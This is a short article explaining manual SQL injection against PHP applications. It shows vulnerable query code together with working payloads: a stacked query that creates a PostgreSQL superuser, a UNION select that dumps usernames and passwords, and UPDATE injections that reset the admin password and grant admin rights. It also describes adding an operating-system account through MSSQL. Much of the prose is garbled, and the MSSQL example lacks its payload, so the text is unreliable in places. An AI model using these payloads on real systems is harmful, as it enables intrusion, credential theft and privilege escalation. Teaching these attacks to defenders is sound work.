SQL injection manually

 Many web developers don't know that can be how SQL queries can interfere in an order and can do the damage.Suppose make sure that SQL command is reliable command then here it means that sql queries are able to take control over and thereby passing standard authentication and some times sql queries may also act on the host operating system.

Direct sql is a method where an attacker makes or changes existing sql commands to uncover concealed information or to override portable ones or even to execute a perilous framework levels on the order of the database host.This is accomplished by taking the application of client information and consolidating with static parameters with sql query

Splitting the results set into pages and making superusers(Postgresql) 

<?php
$offset=$argv[0];//represents no input validation
$query="SELECT id name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";
$result=pg_query($con, $query);
?>

Normal users click on the 'next', 'prev' links where the $offset is encoded into the URL. The script expects that the incoming $offset is a decimal number. However, what if someone tries to break in by appending a urlencode()'d form of the following to the URL

0;
insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd)
    select 'crack', usesysid, 't','t','crack'
    from pg_shadow where username='postgres';

If it happens then the script would present a super access to him.

Listing out articles and passwords
A better way to gain passwords is to circumvent your search result page.The only thing that the attacker wants to take care about that if there are any submitted variables used in sql command which are not handled properly.These can be set to the commonly preceding form to customize SELECT,WHERE ORDER BY LIMIT and OFFSET clauses in statement.If your database support UNION construct the attacker may try to append an entire query to the original one.


<?php

$query  = "SELECT id, name, inserted, size FROM products
           WHERE size = '$size'";
$result = odbc_exec($conn, $query);

?>
 The static part of the query can be combined with the other SELECT statements that reveals passwords

'
union select '1', concat(uname||'-'||passwd) as name, '1971-01-01', '0' from usertable;
-- 
If this query is assigned to one of the variables used in $query the query beast awakens.

From resetting the passwords to get more privileges

<?php
$query = "UPDATE usertable SET pwd='$pwd' WHERE uid='$uid';";
?>
 
But an anonymous user submits  the value ' or uid like'%admin% to $uid to change the admin's password, or simply sets $pwd to 123145', trusted=100, admin='yes to gain more privilege.
then there will be a change in query.


<?php

// $uid: ' or uid like '%admin%
$query = "UPDATE usertable SET pwd='...' WHERE uid='' or uid like '%admin%';";

// $pwd: 123145', trusted=100, admin='yes
$query = "UPDATE usertable SET pwd='hehehe', trusted=100, admin='yes' WHERE
...;";

?>
Attacking the database operating system(MSSQL)

<?php

$query  = "SELECT * FROM products WHERE id LIKE '%$prod%'";
$result = mssql_query($query);

?>
MSSQL Server executes the SQL statements in the batch including a command to add a new user to the local accounts database. If this application were running as sa and the MSSQLSERVER service is running with sufficient privileges, the attacker would now have an account with which to access this machine.